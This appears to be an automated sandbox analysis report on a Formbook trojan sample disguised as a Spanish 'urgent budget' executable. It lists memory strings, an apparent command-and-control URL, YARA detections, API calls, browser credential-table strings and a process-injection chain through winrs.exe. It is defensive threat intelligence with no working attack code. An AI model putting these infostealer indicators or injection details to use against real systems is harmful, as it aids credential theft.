        Source: winrs.exe, 00000004.00000003.8582122558.00000000032AD000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8582423969.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12649540671.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: winrs.exe, 00000004.00000003.8582122558.00000000032AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
        Source: winrs.exe, 00000004.00000003.8582122558.00000000032AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: presupuesto urgente.exe, 00000002.00000003.8264232862.0000000003555000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8263999040.0000000003549000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000002.8362184008.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073912459.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106252124.0000000003550000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8106400648.0000000003555000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: winrs.exe, 00000004.00000002.12649540671.0000000003266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
        Source: winrs.exe, 00000004.00000003.8581508586.0000000008411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
        Source: presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073912459.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: winrs.exe, 00000004.00000003.8590352688.00000000084A7000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8586851291.0000000008432000.00000004.00000020.00020000.00000000.sdmp, 16-84-3.4.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: winrs.exe, 00000004.00000003.8590352688.00000000084A7000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8586851291.0000000008432000.00000004.00000020.00020000.00000000.sdmp, 16-84-3.4.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12660760663.0000000006B58000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.12652275172.0000000004638000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/
        Source: winrs.exe, 00000004.00000002.12652275172.0000000004638000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/whois
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12660760663.0000000006B58000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.12652275172.0000000004638000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domeneshop.no/whois
        Source: winrs.exe, 00000004.00000003.8586851291.0000000008432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073912459.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073912459.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: winrs.exe, 00000004.00000003.8586851291.0000000008432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
        Source: winrs.exe, 00000004.00000003.8590352688.00000000084A7000.00000004.00000020.00020000.00000000.sdmp, 16-84-3.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073912459.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073912459.0000000003556000.00000004.00000020.00020000.00000000.sdmp, presupuesto urgente.exe, 00000002.00000003.8073579084.0000000003549000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: qnFwqCOYxcUlZ.exe, 00000003.00000002.12660760663.0000000007332000.00000004.80000000.00040000.00000000.sdmp, winrs.exe, 00000004.00000002.12652275172.0000000004E12000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.jennarauten.com/h9tv/?PbG=uYvkJTgHEMDqnDyAL7Bx5kFK4VB5WoBnzEJCknt6lKw0HVhBOb4vRoriyZLI8r
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownHTTPS traffic detected: 142.251.40.174:443 -> 192.168.11.20:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.176.193:443 -> 192.168.11.20:49731 version: TLS 1.2
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00405553 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405553

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335734E0 NtCreateMutant,LdrInitializeThunk,2_2_335734E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_33572B90
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_33572D10
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33574260 NtSetContextThread,2_2_33574260
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33574570 NtSuspendThread,2_2_33574570
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572B10 NtAllocateVirtualMemory,2_2_33572B10
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572B00 NtQueryValueKey,2_2_33572B00
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572B20 NtQueryInformationProcess,2_2_33572B20
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572BC0 NtQueryInformationToken,2_2_33572BC0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572BE0 NtQueryVirtualMemory,2_2_33572BE0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572B80 NtCreateKey,2_2_33572B80
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572A10 NtWriteFile,2_2_33572A10
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572AC0 NtEnumerateValueKey,2_2_33572AC0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572A80 NtClose,2_2_33572A80
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572AA0 NtQueryInformationFile,2_2_33572AA0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335729D0 NtWaitForSingleObject,2_2_335729D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335729F0 NtReadFile,2_2_335729F0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335738D0 NtGetContextThread,2_2_335738D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572F00 NtCreateFile,2_2_33572F00
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33572F30 NtOpenDirectoryObject,2_2_33572F30
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
        Source: C:\Users\user\Desktop\presupuesto urgente.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00404D900_2_00404D90
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00406ABA0_2_00406ABA
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354E3102_2_3354E310
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FF3302_2_335FF330
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335313802_2_33531380
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F124C2_2_335F124C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352D2EC2_2_3352D2EC
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3358717A2_2_3358717A
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3352F1132_2_3352F113
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DD1302_2_335DD130
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360010E2_2_3360010E
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335451C02_2_335451C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355B1E02_2_3355B1E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335EE0762_2_335EE076
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354B0D02_2_3354B0D0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F70F12_2_335F70F1
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3357508C2_2_3357508C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335300A02_2_335300A0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F67572_2_335F6757
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335427602_2_33542760
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354A7602_2_3354A760
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335ED6462_2_335ED646
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335646702_2_33564670
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355C6002_2_3355C600
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335DD62C2_2_335DD62C
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FA6C02_2_335FA6C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FF6F62_2_335FF6F6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353C6E02_2_3353C6E0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B36EC2_2_335B36EC
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335406802_2_33540680
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3360A5262_2_3360A526
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FF5C92_2_335FF5C9
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F75C62_2_335F75C6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335404452_2_33540445
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335AD4802_2_335AD480
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_33540B102_2_33540B10
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3357DB192_2_3357DB19
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FFB2E2_2_335FFB2E
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B4BC02_2_335B4BC0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FEA5B2_2_335FEA5B
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FCA132_2_335FCA13
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FFA892_2_335FFA89
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355FAA02_2_3355FAA0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335859C02_2_335859C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3353E9A02_2_3353E9A0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FE9A62_2_335FE9A6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335498702_2_33549870
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3355B8702_2_3355B870
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FF8722_2_335FF872
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335268682_2_33526868
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3356E8102_2_3356E810
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335438002_2_33543800
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335E08352_2_335E0835
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F18DA2_2_335F18DA
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335428C02_2_335428C0
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F78F32_2_335F78F3
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335568822_2_33556882
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335B98B22_2_335B98B2
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335FFF632_2_335FFF63
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_3354CF002_2_3354CF00
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 2_2_335F1FC62_2_335F1FC6
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: String function: 3352B910 appears 188 times
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: String function: 33587BE4 appears 71 times
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: String function: 335AE692 appears 65 times
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: String function: 335BEF10 appears 72 times
        Source: presupuesto urgente.exeStatic PE information: invalid certificate
        Source: presupuesto urgente.exe, 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameloyaliteters radierne.exeR vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000003.8323727937.0000000003598000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewinrs.exej% vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000002.8372612212.00000000337D0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000003.8266535897.0000000033485000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000003.8323727937.00000000035AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewinrs.exej% vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000000.8031073005.0000000000457000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameloyaliteters radierne.exeR vs presupuesto urgente.exe
        Source: presupuesto urgente.exe, 00000002.00000003.8263145257.00000000332C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs presupuesto urgente.exe
        Source: presupuesto urgente.exeBinary or memory string: OriginalFilenameloyaliteters radierne.exeR vs presupuesto urgente.exe
        Source: presupuesto urgente.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000004.00000002.12649287914.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.8372536747.00000000331E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.12650331699.00000000013B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.12651774675.0000000003A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.12651169047.00000000036E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.12651069125.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.8373636229.0000000034250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/9@30/12
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403489
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404814
        Source: C:\Users\user\Desktop\presupuesto urgente.exeCode function: 0_2_004020FE CoCreateInstance,0_2_004020FE
        Source: C:\Users\user\Desktop\presupuesto urgente.exeFile created: C:\Users\user\AppData\Local\Temp\nsx65A3.tmpJump to behavior
        Source: presupuesto urgente.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\presupuesto urgente.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\presupuesto urgente.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: winrs.exe, 00000004.00000003.8586851291.000000000843B000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12653934881.0000000008444000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
        Source: winrs.exe, 00000004.00000003.8582122558.00000000032A8000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000003.8582423969.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12649540671.00000000032CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: winrs.exe, 00000004.00000003.8590352688.00000000084A4000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000004.00000002.12653934881.00000000084B0000.00000004.00000020.00020000.00000000.sdmp, 16-84-3.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: presupuesto urgente.exeReversingLabs: Detection: 18%
        Source: presupuesto urgente.exeVirustotal: Detection: 22%
        Source: C:\Users\user\Desktop\presupuesto urgente.exeFile read: C:\Users\user\Desktop\presupuesto urgente.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\presupuesto urgente.exe "C:\Users\user\Desktop\presupuesto urgente.exe"
        Source: C:\Users\user\Desktop\presupuesto urgente.exeProcess created: C:\Users\user\Desktop\presupuesto urgente.exe "C:\Users\user\Desktop\presupuesto urgente.exe"
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"
        Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\presupuesto urgente.exeProcess created: C:\Users\user\Desktop\presupuesto urgente.exe "C:\Users\user\Desktop\presupuesto urgente.exe"Jump to behavior
        Source: C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"Jump to behavior
